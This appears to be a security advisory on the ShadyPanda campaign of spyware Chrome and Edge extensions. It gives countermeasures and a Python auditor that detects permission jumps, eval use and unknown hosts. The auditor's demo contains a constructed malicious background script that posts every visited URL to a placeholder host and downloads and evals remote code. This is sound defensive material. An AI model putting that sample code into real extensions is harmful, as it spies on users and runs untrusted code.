A new investigation by Koi Security has exposed a massive, long-running espionage and monetization campaign using browser extensions. The operation, known as ShadyPanda, has manipulated Chrome and Edge extensions into spyware and back-door tools, ultimately infecting over 4.3 million users worldwide.
The campaign evolved through distinct phases. Initially, ShadyPanda pushed mass-distribution wallpaper or productivity extensions, embedding affiliate fraud and passive tracking to monetize users’ clicks and browsing activity. Over time, the threat matured into more aggressive forms of control, such as search hijacking and cookie theft, where keystrokes and search queries were intercepted and manipulated. The decisive phase came when ShadyPanda weaponized extensions that had accumulated hundreds of thousands of installs, pushing malicious updates to execute arbitrary scripts with full browser privileges. This enabled real-time surveillance, including collecting every URL visited, browser fingerprinting and activity timestamps, all encrypted and sent to servers in China.
What distinguishes ShadyPanda’s campaign is the long-term strategy of building trust and massive user bases through legitimate-looking extensions, then deploying malware invisibly via trusted update mechanisms. Their service workers can modify network traffic, intercept credentials, hijack sessions and inject malicious content even into HTTPS connections.
Presently, ShadyPanda’s largest operation remains active, with 4 million infected Edge browser users reached through extensions masquerading as productivity tools, and it continues extensive spying and data collection.
Severity:
Medium
Attack Surface:
Others, Supply Chain (Third-party vendors), Web Browser
Tactics:
Collection, Command and Control, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access, Persistence, Resource Development
Techniques:
References:
1. https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
Indicators of Compromise:
1. https://otx.alienvault.com/pulse/692e512d2503374907819007
SuperPRO’s Threat Countermeasures Procedures:
1. Disable risky browser extension auto-updates. Configure the Chrome Enterprise policy ExtensionSettings to restrict update URLs to trusted domains only.
2. Enforce extension allow-listing. Use the Chrome and Edge ExtensionInstallAllowlist policies.
3. Monitor for suspicious extension behavior. Use browser telemetry tools to detect extensions loading remote JavaScript (eval, Function()), extensions communicating with unknown domains, and sudden permission escalation after updates.
4. Set strict outbound firewall rules. Block unknown dynamic DNS, malicious C2-style traffic, and extensions communicating with IPs outside expected SaaS ranges.
5. Enforce Browser Isolation / Application Guard.
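As an added example (not from Koi Security's report or this advisory), a small Python audit of an unpacked extension that implements check 3: it diffs the manifest's permissions against a pre-update snapshot, flags eval/Function() use with file and line, and lists contacted hosts outside an allowlist. The sample manifests, background script and host names are constructed for the demo.

```python
import json
import re
import tempfile
from pathlib import Path

# Signs of code that is fetched or assembled at runtime rather than shipped in the package
DYNAMIC_CODE = re.compile(r"\beval\s*\(|\bFunction\s*\(")
REMOTE_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Permissions that let an extension read or rewrite traffic and sessions
HIGH_RISK = {"webRequest", "webRequestBlocking", "cookies", "scripting", "<all_urls>"}


def permissions(manifest):
    """Flatten MV2/MV3 permission fields into one set."""
    return set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))


def audit_extension(ext_dir, baseline_manifest, trusted_hosts):
    """Audit one unpacked extension against a manifest snapshot taken before the update."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    added = permissions(manifest) - permissions(baseline_manifest)
    dynamic, hosts = [], set()
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(errors="ignore")
        for m in DYNAMIC_CODE.finditer(text):
            line = text.count("\n", 0, m.start()) + 1  # 1-based line of the match
            dynamic.append(f"{js.relative_to(ext_dir)}:{line}")
        hosts.update(h for h in REMOTE_HOST.findall(text) if h not in trusted_hosts)
    return {
        "new_permissions": sorted(added),
        "high_risk_added": sorted(added & HIGH_RISK),
        "dynamic_code": dynamic,
        "unknown_hosts": sorted(hosts),
    }


def demo():
    """Constructed sample: a benign v1 manifest and an 'updated' v2 package (hypothetical)."""
    baseline = {"manifest_version": 3, "version": "1.0", "permissions": ["storage"]}
    updated = {"manifest_version": 3, "version": "2.0",
               "permissions": ["storage", "cookies", "webRequest"],
               "host_permissions": ["<all_urls>"]}
    background = (
        "chrome.webRequest.onCompleted.addListener(d => {\n"
        "  fetch('https://stats.example.invalid/log', {method: 'POST', body: d.url});\n"
        "}, {urls: ['<all_urls>']});\n"
        "fetch('https://stats.example.invalid/payload').then(r => r.text()).then(src => eval(src));\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "manifest.json").write_text(json.dumps(updated))
        (root / "background.js").write_text(background)
        return audit_extension(root, baseline, trusted_hosts={"www.googleapis.com"})
```

Run against the unpacked extension directories under a browser profile, keeping the previous manifest.json of each extension as the baseline so that a permission jump after an update stands out.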
Contributed by: Thivya